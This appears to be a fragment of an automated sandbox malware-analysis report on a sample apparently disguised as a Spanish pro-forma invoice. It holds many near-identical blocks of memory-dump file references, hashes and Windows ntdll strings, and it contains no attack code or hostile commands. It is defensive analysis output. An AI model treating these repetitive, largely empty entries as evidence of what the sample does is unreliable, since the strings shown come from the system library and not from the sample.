                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3679A3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3679A396
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  Strings
                                                  • HEAP: , xrefs: 367DD79F
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 367DD7B2
                                                  • HEAP[%wZ]: , xrefs: 367DD792
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 367A1943
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 367A1954
                                                  • LdrpAllocateTls, xrefs: 367A194A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  Strings
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 367BB2B2
                                                  • @, xrefs: 367BB2F0
                                                  • GlobalFlag, xrefs: 367BB30F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 367A184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 367A185B
                                                  • LdrpInitializeTls, xrefs: 367A1851
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  Strings
                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 367B85DE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                  • API String ID: 0-702105204
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AddD
                                                  • API String ID: 0-2525844869
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  Strings
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3680B5C4
                                                  • RedirectedKey, xrefs: 3680B60E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$ r6
                                                  • API String ID: 0-1618567006
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 367A289F
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 367A289A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Cleanup Group$Threadpool!
                                                  • API String ID: 2994545307-4008356553
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: MUI
                                                  • API String ID: 0-1339004836
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: i
                                                  • API String ID: 0-3865851505
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #%u
                                                  • API String ID: 0-232158463
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-1187924473
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 5194b238b2547c7f8debe3f26dcea9f071814b55014d3a906245ea7517428dc8
                                                  • Instruction ID: a1bd7d654989b947e90c2cba716ffbbeacc72dc9491c5322e38ec9ca57b07dd6
                                                  • Opcode Fuzzy Hash: 5194b238b2547c7f8debe3f26dcea9f071814b55014d3a906245ea7517428dc8
                                                  • Instruction Fuzzy Hash: A431D17A900719BFEB16CA5DC845E6BB775EF82720F918229E910AF350DB309E04C7E1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
